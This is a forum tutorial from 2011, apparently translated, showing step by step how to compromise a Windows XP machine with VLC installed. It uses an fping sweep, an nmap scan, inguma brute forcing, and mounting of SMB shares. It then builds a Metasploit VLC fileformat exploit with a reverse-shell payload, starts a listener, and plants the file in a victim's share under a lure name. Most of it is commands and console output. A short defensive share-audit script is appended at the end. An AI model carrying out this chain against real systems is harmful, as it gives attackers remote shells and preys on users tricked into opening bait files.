05-06-2011, 12:14 AM
OK, back again with me, zee eichel, super handsome and anti-maho.. this time we'll learn a Metasploit attack that works against Windows XP SP3 with VLC media player installed. Why drag VLC into this? Because the attack will end up using the Metasploit exploit for VLC.
Target: Windows XP SP3 with VLC media player installed
Tested on BackTrack R2
First Step --#
First let's check which targets are alive.. in other words, whose machines are switched on.
Code:
root@IBTeam:~# fping -g 192.168.1.32 192.168.1.34
192.168.1.33 is alive
192.168.1.34 is alive
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
ICMP Host Unreachable from 192.168.1.34 for ICMP Echo sent to 192.168.1.32
192.168.1.32 is unreachable
root@IBTeam:~#
Second Step --#
IP address 192.168.1.34 is my laptop (BackTrack), 192.168.1.33 is my PC (Windows), and the one ending in .32 is the VirtualBox IP.. which indeed isn't up at the moment..
That's because I'm testing this in my own room.. I've only ever tested things like this, never done it out in the wild,.. 'cause I'm not a hacker :apn:
OK, moving on.. next we scan the target IP, in this case my PC with Windows XP SP3 installed.
Code:
root@IBTeam:~# nmap -sS -sV -f -n -O 192.168.1.33
Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 14:35 WIT
Nmap scan report for 192.168.1.33
Host is up (0.00055s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
106/tcp open pop3pw Mercury/32 poppass service
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
143/tcp open imap Mercury/32 imapd 4.72
443/tcp open ssl/http Apache httpd 2.2.14 ((Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1)
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 44:87:FC:56:86:85 (Elitegroup Computer System CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
Service Info: Host: localhost; OS: Windows
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.91 seconds
root@IBTeam:~#
OK, as you can see there, the target fits, and the port we need, 445, is indeed open.
Third Step --#
Now, as promised in the title.. I'm going to use file sharing to do the injection..... let's find out the password, if there is one, using inguma.py
Code:
root@IBTeam:/pentest/exploits/inguma# ./inguma.py
WARNING: No route found for IPv6 destination :: (no default route?)
Inguma Version 0.2
Copyright (c) 2006-2008 Joxean Koret <[email protected]>
Copyright (c) 2009-2011 Hugo Teso <[email protected]>
No module named cx_Oracle
inguma> autoscan
Target host or network: 192.168.1.33
Brute force username and passwords (y/n)[n]: y
Automagically fuzz available targets (y/n)[n]: n
Print to filename (enter for stdout):
Inguma 'autoscan' report started at Thu May 5 14:40:12 2011
------------------------------------------------------------
TCP scanning target 192.168.1.33
Scanning port 17004 (418/418)
Open Ports
----------
Port 135/loc-srv is open
Port 3306/mysql is open
Port 139/netbios-ssn is open
Port 143/imap2 is open
Port 80/www is open
Port 445/microsoft-ds is open
MAC Address target 192.168.1.33
192.168.1.33 MAC: 44:87:fc:56:86:85 Unknow
Checking if is in promiscuous state target 192.168.1.33
Target 192.168.1.33 is promiscuous: False
Identifying services target 192.168.1.33
Port 80: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
Port 135: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 139: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 445: SMB Server IBTEAM-D7EA8C87-Windows 5.1/Windows 2000 LAN Manager
Port 3306: Unknow
Port 143: localhost IMAP4rev1 Mercury/32 v4.72 server
Checking what ports are nated target 192.168.1.33
isnated: global name 'IP' is not defined
Detecting operating system target 192.168.1.33
An error ocurred, may be user has not enough privileges or
Couldn't find nmap OS fingerprint DB at data/nmap-os-fingerprints
Gathering NetBIOS information target 192.168.1.33
NetBIOS Information
-------------------
IBTEAM-D7EA8C87 Workstation 44-87-FC-56-86-85 ACTIVE
MSHOME Workstation 44-87-FC-56-86-85 ACTIVE GROUP
IBTEAM-D7EA8C87 Server 44-87-FC-56-86-85 ACTIVE
MSHOME Browser Server 44-87-FC-56-86-85 ACTIVE GROUP
MSHOME brother Browser 44-87-FC-56-86-85 ACTIVE
__MSBROWSE__ Unknown 44-87-FC-56-86-85 ACTIVE GROUP
Is a brother Browser.
MAC Address: 44:87:FC:56:86:85 (Unknow)
Is a Windows based server.
Connecting to the CIFS server target 192.168.1.33
[+] Trying a NULL connection ...
[+] Ok. It works.
Current connection information
------------------------------
Domain name : MSHOME
Lanman : Windows 2000 LAN Manager
Server name : IBTEAM-D7EA8C87
Operative System : Windows 5.1
Server Time : Thu, 05 May 2011 07:41:35 GMT -7
Session Key : 0
Is login required? True
Dumping RPC endpoints target 192.168.1.33
[+] Trying an anonymous connection ...
Gathered data
-------------
[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 80/HTTP...
[!] Protocol failed: HTTPTransport instance has no attribute '_HTTPTransport__socket'
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/TCP...
[!] Protocol failed: unpack requires a string argument of length 12
[+] Trying protocol 139/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
[+] Trying protocol 135/UDP...
[!] Protocol failed: timed out
No endpoints found.
Dumping SAM database target 192.168.1.33
[+] Trying an anonymous connection ...
[+] Retrieving endpoint list from 192.168.1.33
[+] Trying protocol 445/SMB...
[!] Protocol failed: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
samrdump: SessionError: ('S', 'M', 'B', ' ', 'L', 'i', 'b', 'r', 'a', 'r', 'y', ' ', 'E', 'r', 'r', 'o', 'r'), class: ERRDOS, code: ERRnoaccess(Access denied.)
Finding 'gold' anonymously in the CIFS shares target 192.168.1.33
Valid credentials *ARE* required for target 192.168.1.33
Use the following syntax prior to rerun the module:
user="username"
password="password"
Yep, there's the result, at the end of the output.....
4th Step --#
OK, let's just move on. Next we open a file-sharing connection so the target is connected to our BackTrack box. Use the smbclient.py tool.
Code:
root@IBTeam:~# cd /pentest/python/impacket-examples
root@IBTeam:/pentest/python/impacket-examples# ./smbclient.py
# open 192.168.1.33
exception! open() takes exactly 3 arguments (2 given)
# open 192.168.1.33 445
# login username
# shares
E$
tools_music
IPC$
print$
SharedDocs
Music
ADMIN$
C$
Printer
Now notice that the shares exposed by the target machine have appeared: E$, tools_music, IPC$, print$, SharedDocs, Music, ADMIN$, C$, Printer. Once that's done we of course have to mount one first, so that later we can move over the backdoor file we'll build in the next step.
5th Step --#
OK, now let's just mount it... here I mount the tools_music folder....
Code:
root@IBTeam:~# smbmount //192.168.1.33/tools_music /inject/
mount error: can not change directory into mount target /inject/
root@IBTeam:~# smbmount //192.168.1.33/tools_music /media/
Password:
root@IBTeam:~# cd /media.
bash: cd: /media.: No such file or directory
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe vlc-1.1.9-win32.exe
root@IBTeam:/media#
w0w, the directory turns out to contain the VLC installer.. we can just assume this means the owner of the target machine has installed VLC on their computer... next, bro....
6th Step --#
Time to build the backdoor file..... open the Metasploit console
Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11626 updated 103 days ago (2011.01.22)
Warning: This copy of the Metasploit Framework was last updated 103 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use windows/fileformat/videolan_tivo
msf exploit(videolan_tivo) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(videolan_tivo) > set FILENAME bokep_panas.avi
FILENAME => bokep_panas.avi
msf exploit(videolan_tivo) > set OUTPUTPATH /root/
OUTPUTPATH => /root/
msf exploit(videolan_tivo) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(videolan_tivo) > exploit
[*] Creating 'bokep_panas.avi' file ...
[*] Generated output file /root/bokep_panas.avi
msf exploit(videolan_tivo) > show options
Module options (exploit/windows/fileformat/videolan_tivo):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME bokep_panas.avi yes The file name.
OUTPUTPATH /root/ yes The location of the file.
Done! We've successfully built the VLC backdoor file, saved in the root directory.
Now all that's left is to activate the finishing move
Code:
=[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 642 exploits - 326 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
=[ svn r11626 updated 103 days ago (2011.01.22)
Warning: This copy of the Metasploit Framework was last updated 103 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_TCP
[-] The value specified for PAYLOAD is not valid.
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.34
LHOST => 192.168.1.34
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.1.34 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.34:4444
[*] Starting the payload handler...
Last - step
We just move the backdoor file I named bokep_panas.avi earlier into the victim's directory... and wait for the victim to run it.... when will it get clicked? kwokwokw, just pray
Code:
root@IBTeam:~# mv bokep_panas.avi /media/tools_music
root@IBTeam:~# cd /media/
root@IBTeam:/media# ls
K-Lite_Codec_Pack_700_Mega.exe vlc-1.1.9-win32.exe bokep_panas.avi
root@IBTeam:/media#
If it works, you'll get shell access.
Thx to my friend sickness, moderator of the backtrack.org forum, for this tutorial.....
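The whole chain above hinges on a share that accepts a write and a user who opens whatever turns up in it. As an added example (not part of the original post and not from any tool it uses), here is a small Python baseline check a share owner can run: it snapshots the files in a share directory, reports anything new or changed since the baseline, and flags files whose extension claims a container (an .avi must start with a RIFF header carrying the form type "AVI ") but whose header bytes say otherwise. The share path and the sample files are constructed; the file names only mirror the listing shown earlier.

```python
import hashlib
import os
import tempfile

# Expected header per extension: (leading magic, RIFF form type at offset 8 or None).
MAGIC = {".avi": (b"RIFF", b"AVI "), ".exe": (b"MZ", None)}

def snapshot(root):
    """Map each regular file under root (relative path) to its SHA-256."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                out[os.path.relpath(path, root)] = hashlib.sha256(fh.read()).hexdigest()
    return out

def header_mismatch(ext, data):
    """True when the extension promises a format whose header bytes are absent."""
    if ext.lower() not in MAGIC:
        return False  # no expectation recorded for this extension
    magic, form = MAGIC[ext.lower()]
    if not data.startswith(magic):
        return True
    return form is not None and data[8:12] != form

def audit_share(root, baseline):
    """Compare the share against a baseline; return (new, changed, suspicious) paths."""
    current = snapshot(root)
    new = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    suspicious = []
    for rel in new + changed:
        with open(os.path.join(root, rel), "rb") as fh:
            if header_mismatch(os.path.splitext(rel)[1], fh.read(12)):
                suspicious.append(rel)
    return new, changed, sorted(suspicious)

def demo():
    """Constructed sample: two installers at baseline, then a file with a bogus header appears."""
    root = tempfile.mkdtemp()
    for name in ("K-Lite_Codec_Pack_700_Mega.exe", "vlc-1.1.9-win32.exe"):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(b"MZ" + b"\x00" * 62)  # constructed stand-in for a real PE installer
    baseline = snapshot(root)
    with open(os.path.join(root, "bokep_panas.avi"), "wb") as fh:
        fh.write(b"\x00" * 64)  # constructed: named .avi but carries no RIFF/AVI header
    return audit_share(root, baseline)
```

`demo()` runs the constructed scenario; on a real share, take `snapshot()` of the directory once, keep it somewhere the share users cannot write, and call `audit_share()` on a schedule.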
FOLLOW @DutaLinux
for more questions and sharing about security and open source only